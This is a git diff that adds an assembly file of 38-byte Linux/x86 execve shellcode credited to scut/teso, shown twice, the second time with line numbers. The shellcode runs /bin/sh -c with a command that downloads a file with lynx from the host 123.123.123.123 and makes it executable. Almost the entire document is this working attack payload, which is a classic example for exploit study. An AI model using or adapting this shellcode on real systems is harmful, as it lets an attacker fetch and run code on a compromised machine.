1 files changed, 51 insertions, 0 deletions
diff --git a/other/shellgen/sc.s b/other/shellgen/sc.s
new file mode 100644
index 0000000..6133b3e
--- /dev/null
+++ b/other/shellgen/sc.s
@@ -0,0 +1,51 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+.data
+.globl  cbegin
+.globl  cend
+cbegin:
+        jmp     jahead
+docall:
+        pop     %edi
+        movl    %edi, %esp
+        not     %sp                     /* build new stack frame */
+        xorl    %eax, %eax              /* read number of arguments */
+        movb    (%edi), %al
+        inc     %edi
+decl1:  push    %edi
+decl2:  scasb                           /* search delim bytes */
+        jnz     decl2
+        movb    %ah, -1(%edi)
+        dec     %eax
+        jnz     decl1
+        pop     %ebx                    /* pathname */
+        push    %ebx
+        push    %eax
+        pop     %edx                    /* esp -= 4, edx = &envp[] = NULL */
+        movl    %esp, %ecx              /* ecx = &argv[] */
+        movb    $11, %al
+        int     $0x80
+jahead: call    docall
+/* reverse order arguments */
+.byte   0x03    /* number of arguments */
+.ascii  "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte   0x03
+.ascii  "-c"
+.byte   0x02
+.ascii  "/bin/sh"
+.byte   0x01
+cend:

diff --git a/other/shellgen/sc.s b/other/shellgen/sc.s new file mode 100644 index 0000000..6133b3e --- /dev/null +++ b/other/shellgen/sc.s
@@ -0,0 +1,51 @@
	1	/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
	2
	3	.data
	4	.globl cbegin
	5	.globl cend
	6
	7	cbegin:
	8
	9	jmp jahead
	10
	11	docall:
	12	pop %edi
	13
	14	movl %edi, %esp
	15	not %sp /* build new stack frame */
	16
	17	xorl %eax, %eax /* read number of arguments */
	18	movb (%edi), %al
	19	inc %edi
	20
	21	decl1: push %edi
	22	decl2: scasb /* search delim bytes */
	23	jnz decl2
	24
	25	movb %ah, -1(%edi)
	26	dec %eax
	27	jnz decl1
	28
	29	pop %ebx /* pathname */
	30	push %ebx
	31
	32	push %eax
	33	pop %edx /* esp -= 4, edx = &envp[] = NULL */
	34	movl %esp, %ecx /* ecx = &argv[] */
	35
	36	movb $11, %al
	37	int $0x80
	38
	39	jahead: call docall
	40
	41	/* reverse order arguments */
	42	.byte 0x03 /* number of arguments */
	43	.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
	44	.byte 0x03
	45	.ascii "-c"
	46	.byte 0x02
	47	.ascii "/bin/sh"
	48	.byte 0x01
	49
	50	cend:
	51